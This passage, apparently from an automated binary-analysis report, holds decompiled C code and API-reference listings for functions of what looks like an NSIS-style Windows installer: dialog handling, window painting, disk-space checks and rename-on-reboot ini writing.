              											__eflags = _t99;
              											if(_t99 != 0) {
              												goto L26;
              											}
              											 *0x429468 = 1;
              											L21:
              											_push(0x78);
              											L22:
              											E00403E5C();
              											goto L26;
              										}
              										E0040140B(_t127);
              										 *0x429468 = _t127;
              										goto L21;
              									}
              									__eflags =  *0x4091ac - _t133; // 0xffffffff
              									if(__eflags <= 0) {
              										goto L25;
              									}
              									_push(0xffffffff);
              									goto L22;
              								}
              								_push(_t132);
              								goto L22;
              							}
              							SendMessageA(_t126, 0xf3, _t133, _t133);
              							_t103 = IsWindowEnabled(_t126);
              							__eflags = _t103;
              							if(_t103 == 0) {
              								goto L61;
              							}
              							goto L13;
              						}
              						SetWindowLongA(_t125, _t133, _t133);
              						return 1;
              					} else {
              						DestroyWindow( *0x42e3f8);
              						 *0x42e3f8 = _a12;
              						L58:
              						if( *0x42b0a0 == _t133 &&  *0x42e3f8 != _t133) {
              							ShowWindow(_t125, 0xa);
              							 *0x42b0a0 = 1;
              						}
              						L61:
              						return 0;
              					}
              				}
              			}































              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
              • ShowWindow.USER32(?), ref: 00403A09
              • DestroyWindow.USER32 ref: 00403A1D
              • SetWindowLongA.USER32 ref: 00403A39
              • GetDlgItem.USER32(?,?), ref: 00403A5A
              • SendMessageA.USER32 ref: 00403A6E
              • IsWindowEnabled.USER32(00000000), ref: 00403A75
              • GetDlgItem.USER32(?,00000001), ref: 00403B23
              • GetDlgItem.USER32(?,00000002), ref: 00403B2D
              • SetClassLongA.USER32(?,000000F2,?), ref: 00403B47
              • SendMessageA.USER32 ref: 00403B98
              • GetDlgItem.USER32(?,00000003), ref: 00403C3E
              • ShowWindow.USER32(00000000,?), ref: 00403C5F
              • EnableWindow.USER32(?,?), ref: 00403C71
              • EnableWindow.USER32(?,?), ref: 00403C8C
              • GetSystemMenu.USER32 ref: 00403CA2
              • EnableMenuItem.USER32 ref: 00403CA9
              • SendMessageA.USER32 ref: 00403CC1
              • SendMessageA.USER32 ref: 00403CD4
              • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,0042E420), ref: 00403CFD
              • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
              • ShowWindow.USER32(?,0000000A), ref: 00403E40
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
              • String ID:
              • API String ID: 184305955-0
              • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
              • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
              • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
              • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 92%
              			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
              				char* _v8;
              				signed int _v12;
              				void* _v16;
              				struct HWND__* _t52;
              				long _t86;
              				int _t98;
              				struct HWND__* _t99;
              				signed int _t100;
              				intOrPtr _t109;
              				int _t110;
              				signed int* _t112;
              				signed int _t113;
              				char* _t114;
              				CHAR* _t115;
              
              				if(_a8 != 0x110) {
              					if(_a8 != 0x111) {
              						L11:
              						if(_a8 != 0x4e) {
              							if(_a8 == 0x40b) {
              								 *0x42a080 =  *0x42a080 + 1;
              							}
              							L25:
              							_t110 = _a16;
              							L26:
              							return E00403EEA(_a8, _a12, _t110);
              						}
              						_t52 = GetDlgItem(_a4, 0x3e8);
              						_t110 = _a16;
              						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
              							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
              							_t109 =  *((intOrPtr*)(_t110 + 0x18));
              							_v12 = _t100;
              							_v16 = _t109;
              							_v8 = 0x42dbc0;
              							if(_t100 - _t109 < 0x800) {
              								SendMessageA(_t52, 0x44b, 0,  &_v16);
              								SetCursor(LoadCursorA(0, 0x7f02));
              								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
              								SetCursor(LoadCursorA(0, 0x7f00));
              								_t110 = _a16;
              							}
              						}
              						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
              							goto L26;
              						} else {
              							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
              								SendMessageA( *0x42ec28, 0x111, 1, 0);
              							}
              							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
              								SendMessageA( *0x42ec28, 0x10, 0, 0);
              							}
              							return 1;
              						}
              					}
              					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
              						goto L25;
              					} else {
              						_t112 =  *0x429870 + 0x14;
              						if(( *_t112 & 0x00000020) == 0) {
              							goto L25;
              						}
              						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
              						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
              						E00404256();
              						goto L11;
              					}
              				}
              				_t98 = _a16;
              				_t113 =  *(_t98 + 0x30);
              				if(_t113 < 0) {
              					_t113 =  *( *0x42e3fc - 4 + _t113 * 4);
              				}
              				_push( *((intOrPtr*)(_t98 + 0x34)));
              				_t114 = _t113 +  *0x42ec58;
              				_push(0x22);
              				_a16 =  *_t114;
              				_v12 = _v12 & 0x00000000;
              				_t115 = _t114 + 1;
              				_v16 = _t115;
              				_v8 = E00403F97;
              				E00403E83(_a4);
              				_push( *((intOrPtr*)(_t98 + 0x38)));
              				_push(0x23);
              				E00403E83(_a4);
              				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
              				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
              				_t99 = GetDlgItem(_a4, 0x3e8);
              				E00403EB8(_t99);
              				SendMessageA(_t99, 0x45b, 1, 0);
              				_t86 =  *( *0x42ec30 + 0x68);
              				if(_t86 < 0) {
              					_t86 = GetSysColor( ~_t86);
              				}
              				SendMessageA(_t99, 0x443, 0, _t86);
              				SendMessageA(_t99, 0x445, 0, 0x4010000);
              				 *0x429064 =  *0x429064 & 0x00000000;
              				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
              				SendMessageA(_t99, 0x449, _a16,  &_v16);
              				 *0x42a080 =  *0x42a080 & 0x00000000;
              				return 0;
              			}

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
              • String ID: N$open
              • API String ID: 3615053054-904208323
              • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
              • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
              • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
              • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E0040361A(void* __eflags) {
              				intOrPtr _v4;
              				intOrPtr _v8;
              				int _v12;
              				int _v16;
              				char _v20;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t20;
              				void* _t28;
              				void* _t30;
              				int _t31;
              				void* _t34;
              				int _t37;
              				int _t38;
              				int _t42;
              				char _t62;
              				CHAR* _t64;
              				signed char _t68;
              				CHAR* _t79;
              				intOrPtr _t81;
              				CHAR* _t85;
              
              				_t81 =  *0x42ec30;
              				_t20 = E00405F57(3);
              				_t88 = _t20;
              				if(_t20 == 0) {
              					_t79 = 0x42a0a0;
              					 *0x435000 = 0x7830;
              					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
              					__eflags =  *0x42a0a0;
              					if(__eflags == 0) {
              						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
              					}
              					lstrcatA(0x435000, _t79);
              				} else {
              					E00405B25(0x435000,  *_t20() & 0x0000ffff);
              				}
              				E004038E3(_t76, _t88);
              				 *0x42eca0 =  *0x42ec38 & 0x00000020;
              				 *0x42ecbc = 0x10000;
              				if(E0040579B(_t88, 0x434400) != 0) {
              					L16:
              					if(E0040579B(_t96, 0x434400) == 0) {
              						E00405BE9(0, _t79, _t81, 0x434400,  *((intOrPtr*)(_t81 + 0x118)));
              					}
              					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040);
              					 *0x42e408 = _t28;
              					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
              						L21:
              						if(E0040140B(0) == 0) {
              							_t30 = E004038E3(_t76, __eflags);
              							__eflags =  *0x42ecc0;
              							if( *0x42ecc0 != 0) {
              								_t31 = E00404F85(_t30, 0);
              								__eflags = _t31;
              								if(_t31 == 0) {
              									E0040140B(1);
              									goto L33;
              								}
              								__eflags =  *0x42e3ec;
              								if( *0x42e3ec == 0) {
              									E0040140B(2);
              								}
              								goto L22;
              							}
              							ShowWindow( *0x42a078, 5);
              							_t37 = E00405EE9("RichEd20");
              							__eflags = _t37;
              							if(_t37 == 0) {
              								E00405EE9("RichEd32");
              							}
              							_t85 = "RichEdit20A";
              							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
              							__eflags = _t38;
              							if(_t38 == 0) {
              								GetClassInfoA(0, "RichEdit", 0x42e3c0);
              								 *0x42e3e4 = _t85;
              								RegisterClassA(0x42e3c0);
              							}
              							_t42 = DialogBoxParamA( *0x42ec20,  *0x42e400 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0);
              							E0040356A(E0040140B(5), 1);
              							return _t42;
              						}
              						L22:
              						_t34 = 2;
              						return _t34;
              					} else {
              						_t76 =  *0x42ec20;
              						 *0x42e3d4 = _t28;
              						_v20 = 0x624e5f;
              						 *0x42e3c4 = E00401000;
              						 *0x42e3d0 =  *0x42ec20;
              						 *0x42e3e4 =  &_v20;
              						if(RegisterClassA(0x42e3c0) == 0) {
              							L33:
              							__eflags = 0;
              							return 0;
              						}
              						_t12 =  &_v16; // 0x624e5f
              						SystemParametersInfoA(0x30, 0, _t12, 0);
              						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
              						goto L21;
              					}
              				} else {
              					_t76 =  *(_t81 + 0x48);
              					if(_t76 == 0) {
              						goto L16;
              					}
              					_t79 = 0x42dbc0;
              					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x42ec58, 0x42dbc0, 0);
              					_t62 =  *0x42dbc0;
              					if(_t62 == 0) {
              						goto L16;
              					}
              					if(_t62 == 0x22) {
              						_t79 = 0x42dbc1;
              						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
              					}
              					_t64 = lstrlenA(_t79) + _t79 - 4;
              					if(_t64 <= _t79 || lstrcmpiA(_t64, ".exe") != 0) {
              						L15:
              						E00405BC7(0x434400, E004056BA(_t79));
              						goto L16;
              					} else {
              						_t68 = GetFileAttributesA(_t79);
              						if(_t68 == 0xffffffff) {
              							L14:
              							E00405701(_t79);
              							goto L15;
              						}
              						_t96 = _t68 & 0x00000010;
              						if((_t68 & 0x00000010) != 0) {
              							goto L15;
              						}
              						goto L14;
              					}
              				}
              			}

              APIs
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • lstrcatA.KERNEL32(00435000,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,00435400,?,00434000,00000000), ref: 0040368B
              • lstrlenA.KERNEL32(0042DBC0,?,?,?,0042DBC0,00000000,00434400,00435000,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,00435400), ref: 00403700
              • lstrcmpiA.KERNEL32(?,.exe,0042DBC0,?,?,?,0042DBC0,00000000,00434400,00435000,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
              • GetFileAttributesA.KERNEL32(0042DBC0), ref: 0040371E
              • LoadImageA.USER32(00000067,00000001,00000000,00000000,?,00434400), ref: 00403767
                • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
              • RegisterClassA.USER32 ref: 004037AE
              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
              • CreateWindowExA.USER32 ref: 004037FF
              • ShowWindow.USER32(00000005,00000000), ref: 00403835
              • GetClassInfoA.USER32(00000000,RichEdit20A,0042E3C0), ref: 00403861
              • GetClassInfoA.USER32(00000000,RichEdit,0042E3C0), ref: 0040386E
              • RegisterClassA.USER32(0042E3C0), ref: 00403877
              • DialogBoxParamA.USER32 ref: 00403896
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
              • API String ID: 1975747703-2904746566
              • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
              • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
              • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
              • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
              				struct tagLOGBRUSH _v16;
              				struct tagRECT _v32;
              				struct tagPAINTSTRUCT _v96;
              				struct HDC__* _t70;
              				struct HBRUSH__* _t87;
              				struct HFONT__* _t94;
              				long _t102;
              				signed int _t126;
              				struct HDC__* _t128;
              				intOrPtr _t130;
              
              				if(_a8 == 0xf) {
              					_t130 =  *0x42ec30;
              					_t70 = BeginPaint(_a4,  &_v96);
              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
              					_a8 = _t70;
              					GetClientRect(_a4,  &_v32);
              					_t126 = _v32.bottom;
              					_v32.bottom = _v32.bottom & 0x00000000;
              					while(_v32.top < _t126) {
              						_a12 = _t126 - _v32.top;
              						asm("cdq");
              						asm("cdq");
              						asm("cdq");
              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
              						_t87 = CreateBrushIndirect( &_v16);
              						_v32.bottom = _v32.bottom + 4;
              						_a16 = _t87;
              						FillRect(_a8,  &_v32, _t87);
              						DeleteObject(_a16);
              						_v32.top = _v32.top + 4;
              					}
              					if( *(_t130 + 0x58) != 0xffffffff) {
              						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
              						_a16 = _t94;
              						if(_t94 != 0) {
              							_t128 = _a8;
              							_v32.left = 0x10;
              							_v32.top = 8;
              							SetBkMode(_t128, 1);
              							SetTextColor(_t128,  *(_t130 + 0x58));
              							_a8 = SelectObject(_t128, _a16);
              							DrawTextA(_t128, 0x42e420, 0xffffffff,  &_v32, 0x820);
              							SelectObject(_t128, _a8);
              							DeleteObject(_a16);
              						}
              					}
              					EndPaint(_a4,  &_v96);
              					return 0;
              				}
              				_t102 = _a16;
              				if(_a8 == 0x46) {
              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
              					 *((intOrPtr*)(_t102 + 4)) =  *0x42ec28;
              				}
              				return DefWindowProcA(_a4, _a8, _a12, _t102);
              			}

              APIs
              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectA.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextA.USER32(00000000,0042E420,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F
              • API String ID: 941294808-1304234792
              • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
              • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
              • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
              • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E00405915(void* __eflags) {
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t15;
              				long _t16;
              				int _t20;
              				void* _t28;
              				long _t29;
              				intOrPtr* _t37;
              				int _t43;
              				void* _t44;
              				long _t47;
              				CHAR* _t49;
              				void* _t51;
              				void* _t53;
              				intOrPtr* _t54;
              				void* _t55;
              				void* _t56;
              
              				_t15 = E00405F57(2);
              				_t49 =  *(_t55 + 0x18);
              				if(_t15 != 0) {
              					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
              					if(_t20 != 0) {
              						L16:
              						 *0x42ecb0 =  *0x42ecb0 + 1;
              						return _t20;
              					}
              				}
              				 *0x42c230 = 0x4c554e;
              				if(_t49 == 0) {
              					L5:
              					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
              					if(_t16 != 0 && _t16 <= 0x400) {
              						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
              						_t56 = _t55 + 0x10;
              						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)( *0x42ec30 + 0x128)));
              						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
              						_t53 = _t20;
              						 *(_t56 + 0x14) = _t53;
              						if(_t53 == 0xffffffff) {
              							goto L16;
              						}
              						_t47 = GetFileSize(_t53, 0);
              						_t7 = _t43 + 0xa; // 0xa
              						_t51 = GlobalAlloc(0x40, _t47 + _t7);
              						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
              							L15:
              							_t20 = CloseHandle(_t53);
              							goto L16;
              						} else {
              							if(E00405813(_t51, "[Rename]\r\n") != 0) {
              								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
              								if(_t28 == 0) {
              									L13:
              									_t29 = _t47;
              									L14:
              									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
              									SetFilePointer(_t53, 0, 0, 0);
              									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
              									GlobalFree(_t51);
              									goto L15;
              								}
              								_t37 = _t28 + 1;
              								_t44 = _t51 + _t47;
              								_t54 = _t37;
              								if(_t37 >= _t44) {
              									L21:
              									_t53 =  *(_t56 + 0x14);
              									_t29 = _t37 - _t51;
              									goto L14;
              								} else {
              									goto L20;
              								}
              								do {
              									L20:
              									 *((char*)(_t43 + _t54)) =  *_t54;
              									_t54 = _t54 + 1;
              								} while (_t54 < _t44);
              								goto L21;
              							}
              							E00405BC7(_t51 + _t47, "[Rename]\r\n");
              							_t47 = _t47 + 0xa;
              							goto L13;
              						}
              					}
              				} else {
              					CloseHandle(E0040589E(_t49, 0, 1));
              					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
              					if(_t16 != 0 && _t16 <= 0x400) {
              						goto L5;
              					}
              				}
              				return _t16;
              			}

              APIs
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • CloseHandle.KERNEL32(00000000), ref: 00405962
              • GetShortPathNameA.KERNEL32 ref: 0040596B
              • GetShortPathNameA.KERNEL32 ref: 00405988
              • wsprintfA.USER32 ref: 004059A6
              • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405A06
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A5E
              • GlobalFree.KERNEL32(00000000), ref: 00405A65
              • CloseHandle.KERNEL32(00000000), ref: 00405A6C
                • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
              • String ID: %s=%s$[Rename]
              • API String ID: 3445103937-1727408572
              • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
              • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
              • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
              • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
              				signed int _v8;
              				signed int _v12;
              				long _v16;
              				long _v20;
              				long _v24;
              				char _v28;
              				intOrPtr _v32;
              				long _v36;
              				char _v40;
              				unsigned int _v44;
              				signed int _v48;
              				CHAR* _v56;
              				intOrPtr _v60;
              				intOrPtr _v64;
              				intOrPtr _v68;
              				CHAR* _v72;
              				void _v76;
              				struct HWND__* _v80;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t82;
              				long _t87;
              				signed char* _t89;
              				void* _t95;
              				signed int _t96;
              				int _t109;
              				signed short _t114;
              				signed int _t118;
              				struct HWND__** _t122;
              				intOrPtr* _t138;
              				CHAR* _t146;
              				unsigned int _t150;
              				signed int _t152;
              				unsigned int _t156;
              				signed int _t158;
              				signed int* _t159;
              				struct HWND__* _t165;
              				struct HWND__* _t166;
              				int _t168;
              				unsigned int _t197;
              
              				_t156 = __edx;
              				_t82 =  *0x429870;
              				_v32 = _t82;
              				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
              				_v12 =  *((intOrPtr*)(_t82 + 0x38));
              				if(_a8 == 0x40b) {
              					E0040546C(0x3fb, _t146);
              					E00405E29(_t146);
              				}
              				_t166 = _a4;
              				if(_a8 != 0x110) {
              					L8:
              					if(_a8 != 0x111) {
              						L20:
              						if(_a8 == 0x40f) {
              							L22:
              							_v8 = _v8 & 0x00000000;
              							_v12 = _v12 & 0x00000000;
              							E0040546C(0x3fb, _t146);
              							if(E0040579B(_t185, _t146) == 0) {
              								_v8 = 1;
              							}
              							E00405BC7(0x429068, _t146);
              							_t87 = E00405F57(1);
              							_v16 = _t87;
              							if(_t87 == 0) {
              								L30:
              								E00405BC7(0x429068, _t146);
              								_t89 = E0040574E(0x429068);
              								_t158 = 0;
              								if(_t89 != 0) {
              									 *_t89 =  *_t89 & 0x00000000;
              								}
              								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
              									goto L35;
              								} else {
              									_t168 = 0x400;
              									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
              									asm("cdq");
              									_v48 = _t109;
              									_v44 = _t156;
              									_v12 = 1;
              									goto L36;
              								}
              							} else {
              								_t159 = 0;
              								if(0 == 0x429068) {
              									goto L30;
              								} else {
              									goto L26;
              								}
              								while(1) {
              									L26:
              									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
              									if(_t114 != 0) {
              										break;
              									}
              									if(_t159 != 0) {
              										 *_t159 =  *_t159 & _t114;
              									}
              									_t159 = E00405701(0x429068) - 1;
              									 *_t159 = 0x5c;
              									if(_t159 != 0x429068) {
              										continue;
              									} else {
              										goto L30;
              									}
              								}
              								_t150 = _v44;
              								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
              								_v44 = _t150 >> 0xa;
              								_v12 = 1;
              								_t158 = 0;
              								__eflags = 0;
              								L35:
              								_t168 = 0x400;
              								L36:
              								_t95 = E00404755(5);
              								if(_v12 != _t158) {
              									_t197 = _v44;
              									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
              										_v8 = 2;
              									}
              								}
              								if( *((intOrPtr*)( *0x42e3fc + 0x10)) != _t158) {
              									E0040473D(0x3ff, 0xfffffffb, _t95);
              									if(_v12 == _t158) {
              										SetDlgItemTextA(_a4, _t168, 0x429058);
              									} else {
              										E00404678(_t168, 0xfffffffc, _v48, _v44);
              									}
              								}
              								_t96 = _v8;
              								 *0x42ecc4 = _t96;
              								if(_t96 == _t158) {
              									_v8 = E0040140B(7);
              								}
              								if(( *(_v32 + 0x14) & _t168) != 0) {
              									_v8 = _t158;
              								}
              								E00403EA5(0 | _v8 == _t158);
              								if(_v8 == _t158 &&  *0x42a08c == _t158) {
              									E00404256();
              								}
              								 *0x42a08c = _t158;
              								goto L53;
              							}
              						}
              						_t185 = _a8 - 0x405;
              						if(_a8 != 0x405) {
              							goto L53;
              						}
              						goto L22;
              					}
              					_t118 = _a12 & 0x0000ffff;
              					if(_t118 != 0x3fb) {
              						L12:
              						if(_t118 == 0x3e9) {
              							_t152 = 7;
              							memset( &_v76, 0, _t152 << 2);
              							_v80 = _t166;
              							_v72 = 0x42a0a0;
              							_v60 = E00404612;
